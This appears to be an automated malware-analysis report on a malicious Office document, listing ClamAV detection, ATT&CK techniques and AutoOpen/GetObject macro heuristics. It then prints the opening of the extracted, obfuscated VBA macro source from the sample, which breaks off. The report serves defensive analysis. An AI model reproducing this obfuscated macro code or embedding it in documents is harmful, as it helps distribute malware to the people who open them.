MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including auto-execution markers like 'autoopen' and 'GetObject' calls. The presence of obfuscated VBA code suggests an attempt to conceal malicious activity, such as downloading and executing a secondary payload, which is a common tactic for malware distribution.
Heuristics (8)
- ClamAV: Doc.Malware.Dpxx-6863824-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Dpxx-6863824-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
  - AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
  - GetObject call [high] OLE_VBA_GETOBJ: GetObject call
  - VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74463 bytes |

SHA-256: 6dab8991788cc740ef0e5111b13dc4b350b9c90c7afbd2f060ee205cfd381edb

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "l508_39_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "t_0__2"
Function K9_763()
U2918415 = 532667031 - 500384989
Y_1730 = 707955830 + s___890
Select Case Q3_27_
Case 673620104
K9041755 = Chr(802957490 * Tan(K_5_4850))
h5463125 = o3_73_
Case 630865060
U4_46_7 = v_010_
Y__741 = v___84_
Case 482110841
k_2_8_3_ = 416266750
o84__7_ = H44_8_
End Select
q_00182_ = 396063325 - 662115800
J_1_3_ = 422720819 + B807__
Select Case u35_4_47
Case 277168866
G_6__89_ = Chr(985698536 * Tan(k78__7))
D_7377 = w__8_1
Case 745694497
j90_6_9 = Y_663_61
j8_66301 = P0__83
Case 814567607
i__3_1 = 718667579
j_2_6__ = M4___6_6
End Select
b6_216 = 264305446 - 139717851
F_694_ = 278789105 + w6__83
Select Case R67053
Case 583927250
L164_4_ = Chr(623460735 * Tan(K1_100_))
k06__4__ = m9_7004
Case 410405657
G_2182 = S__7__7
C01_702_ = i4665_4
Case 612439703
Q602767 = 540472436
z_0_3_23 = B59083
End Select
r88358 = 947279681 - 582157667
h16962 = 271529948 + Y760_3
Select Case I2119469
Case 220041650
m91249_8 = Chr(647937501 * Tan(j60_4_6))
D_0_7912 = z3_4_8
Case 421630093
D_903_ = Q__9358
w49990_9 = t3_3_7
Case 227823214
X4711_04 = 804525400
s45383_8 = s27997
End Select
b4__8_16 = 196773701 - 656276832
l194440_ = 599273966 + m126989
Select Case k_9765
Case 755467028
n7___360 = Chr(700958585 * Tan(X542_3))
Z7_9011 = G__8_2_
Case 937223718
N_1__3_9 = a936634
M__5_9_7 = J637506
Case 480470993
Y_794_80 = 558903128
u_231802 = h32345
End Select
j_176444 = 876656672 - 324418534
J2__4_11 = 173124531 + i_9__004
Select Case Y_294_
Case 587511501
A581__ = Chr(799571047 * Tan(H84__26))
Z8932300 = O1_7___
Case 583460371
j1_012__ = C39329
M6547209 = O__75_
Case 97868077
u315__3 = 616735897
j564250 = a__6_00
End Select
W94__16 = 515911793 - 104197173
N911915 = 41877715 + U_87810
Select Case i0323220
Case 630324574
S2__30 = Chr(148906362 * Tan(N26311))
T5_035__ = s_760__
Case 95083721
j5___388 = D25645
J_3_235 = t666___1
Case 85303498
v__482 = 408734274
C26_3_6 = L_9_702_
End Select
E_31530 = 498289534 - 683841658
n7724__9 = 939334201 + A720_6
Select Case L1723710
Case 607404833
C16_7_ = Chr(470534082 * Tan(r1740_))
u0750___ = O03545_
Case 641469592
a0_47__ = K7785__
T1033534 = r351753
Case 251036249
s_2832 = 912728271
s84844 = S7923_55
End Select
End Function
Function p7_6_8(G_275211, z32849_)
On Error Resume Next
V052422 = 320593413 - 897970229
C_62_8 = 405680589 + Z4___451
Select Case T96074
Case 296962639
N5535_8 = Chr(243868031 * Tan(n_59_1))
d6__1099 = H__76__
Case 417885420
Y_31__ = D_0056_
a499_7_ = N587_5_
Case 92017704
K__2_489 = 969838123
W_05438 = R5_508_9
End Select
E6___85 = 526132691 - 724091118
O__18724 = 835334687 + H59__2
Select Case U8_22_3_
Case 560561134
Y_338553 = Chr(126427085 * Tan(E6__483))
K__545_ = R08811
Case 286818218
F09_7_ = b44909_
a1__360 = M185_956
Case 90322472
L8_9__ = 647306733
i2_6784 = w4__90
End Select
Set z_4_4
... (truncated)